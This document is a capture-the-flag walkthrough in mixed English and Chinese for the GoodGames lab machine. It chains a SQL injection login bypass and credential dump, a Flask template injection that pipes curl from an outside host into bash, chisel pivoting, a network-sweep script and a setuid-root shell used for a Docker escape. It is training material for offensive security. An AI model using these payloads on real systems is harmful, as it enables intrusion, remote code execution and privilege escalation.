[Meachines] [Easy] GoodGames SQLI+Flask SSTI+Docker逃逸权限提升

Information Gathering

IP Address Opening Ports
10.10.11.130 TCP:80

$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb

SQLI

# echo '10.10.11.130 goodgames.htb' >> /etc/hosts

$ dirsearch -u 'http://goodgames.htb'

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac

email=1%40gmail.com'--+&password=123

email=1%40gmail.com'%20OR%20'1'='1'--+&password=123

$ sqlmap -r sqli -p email --batch

$ sqlmap -r sqli -p email --batch -D main -T user --dump

email:admin@goodgames.htb
username:admin
password:superadministrator

# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts

Flask SSTI Injection

http://internal-administration.goodgames.htb/login

POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
Upgrade-Insecure-Requests: 1


name={{9*9}}

name={``{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}

User.txt

388118f20c90df4d38744d9ac624dd43

Privilege Escalation : Docker Escape

Server:

$ chisel server -p 8000 --reverse

Client:

# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks

Server:

$ vim 10.10.11.130.conf

Client:

# arp -a

https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh

#!/bin/bash
# pivoting.sh — quick "where am I and what can I reach" enumeration for a
# foothold host. Flow: print basic host info and local IPs, list which
# common utilities exist, then ping-sweep each /24 prefix given as an
# argument (format: 192.168.0) and probe TCP ports 1-10001 on every host
# that answered. Runs without set -e / set -u, so unset variables and
# failing commands are silently tolerated.
# Side effects worth knowing from a defensive standpoint: every responding
# address is appended to ./hosts.txt (left on disk in the working
# directory), each sweep sends one ICMP echo per address sequentially, and
# the port probe fires ~10k backgrounded connect attempts per live host —
# noisy, and easy to spot in host or network telemetry.

# ANSI colour escapes consumed by the echo -e calls below.
RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
ENDCOLOR="\e[0m"

hostname=$(hostname)

echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"


echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
# $(NF - -4) is $(NF+4): a field past the last one, which expands empty, so
# each ifconfig line becomes " <last field>" and cut -c 2- strips that
# leading space. The grep patterns are regexes, so "." matches any
# character (e.g. "172." also matches "1720"). Output depends on the local
# ifconfig layout — TODO confirm on the target.
ifconfig | awk '{print $(NF - -4), $NF}' | grep "172."  | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"

echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"

# One "which" per tool; a found tool prints its path, a missing one prints
# nothing (or an error, depending on the which implementation).
# Style: `command -v` is the portable builtin form of this check.
which aws
which netcat
which nc.traditional
which curl
which ping
which gcc
which g++
which make
which gdb
which base64
which socat
which python
which python2
which python3
which perl
which php
which ruby
which xterm
which sudo
which wget
which nc 
which nmap
which fping

echo -e "\n"

echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"

# Argument check happens only now, after the info section has already run.
# $1 is unquoted: with no arguments this is `[ -z ]`, a one-argument test
# that is true because the string "-z" is non-empty — it works by accident.
if [ -z $1 ]
then
    echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
    exit 1
fi

# The four blocks below copy 1-4 positional prefixes into the hosts array.
# `$# =~ N` is a regex (substring) match on the argument count, not an
# equality test; with more than four arguments none of them fires and
# hosts stays unset, so the loops further down iterate over nothing.
if [[ $# =~ 1 ]]
then
   hosts=($1)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
fi

if [[ $# =~ 2 ]]
then
   hosts=($1 $2)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
fi

if [[ $# =~ 3 ]]
then
   hosts=($1 $2 $3)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
fi

if [[ $# =~ 4 ]]
then
   hosts=($1 $2 $3 $4)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
fi


# Ping sweep: one echo request per address .1-.254 of each prefix, run
# sequentially with a 0.5 s cap. ${hosts[@]} is unquoted (fine for dotted
# prefixes, would break on whitespace).
for host in ${hosts[@]}; do
	echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
	for i in $(seq 1 254); do
		# &> is a redirection, not a background job; $? is timeout's status
		# (124 when the 0.5 s limit hits, otherwise ping's own exit code).
		timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
		a=$(echo $?)
		# Regex match again: true when the status string contains a "0".
		if [[ $a =~ 0 ]]
		then
			# Append to the global array (grows from whatever length it has)
			# and persist the address to hosts.txt in the working directory.
			array[${#array[@]}]=$host.$i
			echo $host.$i >> hosts.txt
			# Second ping just to read the TTL: prints "$(NF-2) $NF" of the
			# reply line and keeps characters 5-7 — presumably the digits
			# after "ttl=" when that token sits at NF-2; verify against the
			# local ping output format.
			b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
			# TTL-based OS guess (64-ish → Linux, 128-ish → Windows); a
			# heuristic only, and each =~ is a substring match.
			if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
                	then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Linux]"
			
			elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
			then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Windows]"
			else
				echo "[+] HOST $host.$i  ACTIVE  [OS=UNDETECTED]"
			fi
		fi
	# Nothing in this inner loop is backgrounded, so this wait is a no-op.
        done; wait
done

# Port probe over bash's /dev/tcp (bash-only feature): ports 1..10001
# inclusive, every attempt backgrounded with a 1 s cap, then a barrier
# wait per host. Only successful connects print; failures are discarded.
for host in ${array[@]}; do
        echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
        for port in $(seq 1 10001); do
                timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
        done; wait
done

# ./host_discovery.sh 172.19.0

Server:

$ sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1

Docker 用户在 augustus 目录中创建 test 文件，该文件的所有者是 root

#include <stdio.h>
#include <stdlib.h>

/*
 * Minimal setuid wrapper from the writeup. Once the compiled binary is
 * root-owned and carries the setuid bit (the `chmod u+s suid` step), the
 * shell started by system() runs with uid 0.
 * NOTE(review): setuid() is declared in <unistd.h>, which is not included
 * here — the implicit declaration is a warning on older compilers and an
 * error on recent ones; its return value is also unchecked. main() has no
 * return statement; C99 and later treat falling off the end as returning 0.
 * Defensive takeaway (per the writeup's observation that a file created
 * from the container shows up root-owned in augustus's home): a home
 * directory shared between the host and a container running as root lets
 * container-side file ownership and mode bits carry over to the host.
 * Mitigations are not running the container as root, user-namespace
 * remapping, or mounting shared paths with nosuid.
 */
int main() {
        setuid(0);          /* requires the setuid-root bit to take effect */
        system("/bin/bash"); /* interactive shell inherits the new uid */
}

# wget http://10.10.16.16/suid.c

# gcc suid.c -o suid

# chmod u+s suid

augustus@GoodGames:~$ ./suid

Root.txt

a42c76fe28f8a2556fa7e8794f133c15
